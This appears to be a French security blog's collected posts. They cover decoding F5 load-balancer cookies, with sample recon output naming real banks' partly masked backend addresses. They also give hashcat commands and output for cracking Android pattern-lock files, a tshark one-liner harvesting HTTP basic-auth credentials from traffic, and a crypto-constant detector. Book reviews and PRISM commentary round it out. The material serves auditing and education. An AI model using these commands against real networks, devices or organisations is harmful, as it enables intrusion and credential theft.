J’ai pondu un petit script [f5discovery] qui fait le travail tout seul… C’est trop drôle… ça marche à tous les coups.. et ça fait juste un petit Get :) Mais de nos jours par peur des représailles je ne peux montrer ici qu’une simulation totalement imaginaire, car dans la vraie vie tout est mis en place par des gens très compétents, formés et qui connaissent par conséquent le produit à font.
Je sais… Ces propos sont délirants. Car c’est bien connus, c’est uniquement le bon produit qui assure une totale sécurité, jamais, au grand jamais les gens autour.. Si Si soyez en persuadés, tous les vendeurs nous le disent ! Il suffit de poser la boite et le miracle opère.
La Banque Populaire…
$ ./f5discovery.py https://www.ibps.lorrainechampagne.banquepopulaire.fr + Search for Cookies.. > AMAuthCookie > amlbcookie > nav > LBRPSBPLC Backend : XXX.XX.XXX.134:50443 << Got a F5 one > ck > JSESSIONID
Fortis Luxembourg…
$ ./f5discovery.py http://www.fortis.lu + Search for Cookies.. > TS2c121f > g4f9_12 Backend : 10.XXX.XXX.XXX:10835 << Got a F5 one
Le Crédit Lyonnais…
$ ./f5discovery.py https://particuliers.secure.lcl.fr + Search for Cookies.. > LBzb-cli Backend : XX.XXX.XXX.7:80 << Got a F5 one
C’est décidément virtuellement très prisé le Loadbalanceur F5 ! Messieurs les auditeurs de la sécu à Papa… a votre Word… Prêt … Partez ! y a des sous à se faire…
Rappelons donc pour les moins formés, qu’il est possible d’encrypter totalement ce cookie de session… [Voir ici]
Si on croise un Loadbalanceur F5 LTM il se peut que l’on reçoive ce genre de cookies.
Set-Cookie: STICKCOOKIE=923445440.39455.0000; path=/
Dans ce cas de figure on sait deux chose..
923445440 c’est 0x370aa8c0… soit byte par byte 55 10 168 192.. les finauds auront retrouvé 192.168.10.55
39455 c’est en hexa 0x1F9A.. on le retourne byte à byte.. 0x9A1F.. et hop c’est le port 8090.
Ce backend derrière mon loadbalanceur est donc 192.168.10.55:8090
Dans l’absolu, cela ne casse pas trois pattes à un canard mais cela peut servir en scouting et il y a bien un auditeur qui s’en offusquera un jour !
Bon c’est connu maintenant, la paterne est dans le fichier /data/system/gesture.key et c’est un vieux Sha1 non salé
https://code.google.com/p/android/issues/detail?id=37218
C’est clairement expliqué là : http://forensics.spreitzenbarth.de/2012/02/28/cracking-the-pattern-lock-on-android/
Le plus dur est d’avoir une liste de Sha1 avec que des numériques en hexa rapidement. Heureusement… il y a Hashcat qui fait ça instantanément..
Voici la syntaxe qui va bien :
Convertir le hash en ascii
$ cat /home/thanatos/Desktop/gesture.key | hexdump -v -e '/1 "%02x"' > ../hash.txt
Hasher menu ce Hash…(4 Secondes).
$ ./oclHashcat-plus64.bin -m 100 -a 3 -o ../result.bin ../hash.txt --hex-charset -1 000102030405060708 ?1?1?1?1?1?1?1?1?1 --force -i oclHashcat-plus v0.14 by atom starting... Hashes: 1 total, 1 unique salts, 1 unique digests Bitmaps: 8 bits, 256 entries, 0x000000ff mask, 1024 bytes Workload: 128 loops, 80 accel Watchdog: Temperature abort trigger set to 90c Watchdog: Temperature retain trigger set to 80c Device #1: Cypress, 512MB, 725Mhz, 18MCU Device #1: Kernel ./kernels/4098/m0100_a3.Cypress_1124.2_1124.2.kernel (311420 bytes) Session.Name...: oclHashcat-plus Status.........: Cracked Input.Mode.....: Mask (?1?1?1?1?1?1?1?1?1) Hash.Target....: 23a6e7c835cd75c3f17ecc4d1cd7d840b7409525 Hash.Type......: SHA1 Time.Started...: 0 secs Speed.GPU.#1...: 1224.5M/s Recovered......: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts Progress.......: 287612928/387420489 (74.24%) Rejected.......: 0/287612928 (0.00%) HWMon.GPU.#1...: 0% Util, 63c Temp, 42% Fan Started: Fri Jul 26 03:45:10 2013 Stopped: Fri Jul 26 03:45:14 2013
on explique…
./oclHashcat-plus64.bin -m 100 -a 3 -o ../result.bin ../hash.txt --hex-charset -1 000102030405060708 ?1?1?1?1?1?1?1?1?1 --force -i
-m 100 = type de hash sha1
-a 3 = le type de recherche c’est bruteforce
-o nom du fichier de sortie
-hex-charset : les characteres qu’il va essayer sont en hexa
-1 jeux de characteres (en hexa donc) 00 01 etc…
?1?1?1… C’est la patterne de password… ?1 veut dire fout un des chars du jeu de caractères.
–force (j’ai un driver…border line… vous n’êtes pas obligé)
-i incrémental.. essaye 00 à 08 puis 0000 à 0808 etc.. tous les lock n’ont pas la même taille.
Lire le résultat.
$ cat ../result.bin | cut -d ":" -f2 | hexdump -v -e '/1 "%02x\n"' | grep -v 0a 02 01
Adi…
On m’a prêté “L’histoire des codes secrets” de Simon Singh et je le recommande vivement. Avec cela, les challs de crypto n’auront plus de secrets pour vous !
C’est fun, instructif, ça happe le lecteur avec des histoires passionnantes. En allant de la crypto pour les gamins type Caesar en passant par la rocambolesque histoire d’enigma passé en douce dans les valoches de Sacha Guitry. De la crytanalyse qui tua Mary Stuart au déchiffrage des langues anciennes. Le tout pour en finir avec DES, DH et RSA et même un poil sur l’encryption Quantique. On ne peut que regretter que le livre soit trop ancien pour nous conter la sélection du concours AES.
En plus, y a 10 Challs à la fin du livre !!!
Isbn : 978-2253150978
Si vous aussi vous avez ce genre de messages de l’étrange en tentant de lancer suricata sur plusieurs queues de la carte réseau en mode af_packet…
<Error> - [ERRCODE: SC_ERR_AFP_CREATE(190)] - Coudn't set fanout mode, error Protocol not available" <Error> - [ERRCODE: SC_ERR_AFP_CREATE(190)] - Couldn't init AF_PACKET socket
C’est que votre kernel est trop vieux ! (bye bye Squeeze…)
On parle de ‘Prism’ dans la presse, alors Info ou Intox … Je penche pour info, rien que parce que tous le monde s’acharne à démentir.
http://www.washingtonpost.com/wp-srv/special/politics/prism-collection-documents/
Mais ne rêvons pas, c’est pas pire que d’autre grandes démocraties..
Korée http://north-korea.narod.ru/dprk_internet.htm
Iran http://reseaux.blog.lemonde.fr/2012/10/22/iran-numerique-ambivalence-mollahs/
Russie http://barentsobserver.com/en/security/2013/03/fsb-can-tap-your-skype-without-court-order-14-03
Et je ne retrouve pas cet article sur la surveillances des cables sous marins.
Bref c’est pas tout neuf…
http://fr.wikipedia.org/wiki/Renseignement_d’origine_%C3%A9lectromagn%C3%A9tique
Alors pour les vacances, ISBN 2070248100 et mettez vous au chiffrement de Vernam (Bon ok pour la vidéo conférence c’est tendu)
En audit ou autre… l’authentification HTTP basique est juste un header contenant base64(user:password) Il est ainsi très facile de moissonner les identifiants si on est sur le chemin. On retrouve cette chose avant un proxy ou un honteux site web avec authentification basique.
Voici une ligne wireshark qui mouline tout ce qui passe sur le port 8080 et le petit perl d’après évite les doublons.
tshark -ieth2 port 8080 -R "http.request.method" -Tfields -e http.authbasic \
| perl -ne 'unless (exists($I{$_})) { print ; $I{$_}=1;}'
L’output attendue est sympa :
Running as user "root" and group "root". This could be dangerous. Capturing on eth2 thanatos:helloword quidam1:taud16er quidam2:funky123@ ...
Enfin le 1er livre sur le désossage en francais.
Malwares
ISBN : 978-2746079656
Un bon livre d’info, avec le tarif habituel d’un livre info. Sniff… Malwares Identification-éradication
Bon ok, je suis très peu objectif. L’auteur paye ses bières :)
Le script du jour… il détecte les constantes remarquables des fonctions de cryptage et de hashing bien connues à l’intérieur d’un fichier. Voila de quoi gagner du temps sur du Chall ou du Malware (évidemment non packé hein !).
Un petit Crackme avec du MD5 dedans:
$ python crytporacle.py ../../challbox/yod/toto3 Checking AES constantes Found 70% Checking AES Reverse SBox Found 0% Checking SHA1 constantes Found 44% Checking MD4/5 constantes R Found 100% Checking MD5 constantes K Found 100% Checking Whirpool Hash SBox Found 0%
Monsieur OpenSSL:
$ python crytporacle.py /usr/lib/i686/cmov/libcrypto.so.0.9.8 Checking AES constantes Found 100% Checking AES Reverse SBox Found 100% Checking SHA1 constantes Found 100% Checking MD4/5 constantes R Found 100% Checking MD5 constantes K Found 100% Checking Whirpool Hash SBox Found 0%
Un fichier “Tout venant” :
$ python crytporacle.py /bin/echo Checking AES constantes Found 80% Checking AES Reverse SBox Found 0% Checking SHA1 constantes Found 0% Checking MD4/5 constantes R Found 0% Checking MD5 constantes K Found 0% Checking Whirpool Hash SBox Found 0%
Seul le 100% Fait foi.
Dispo ici : https://github.com/Th4nat0s/Chall_Tools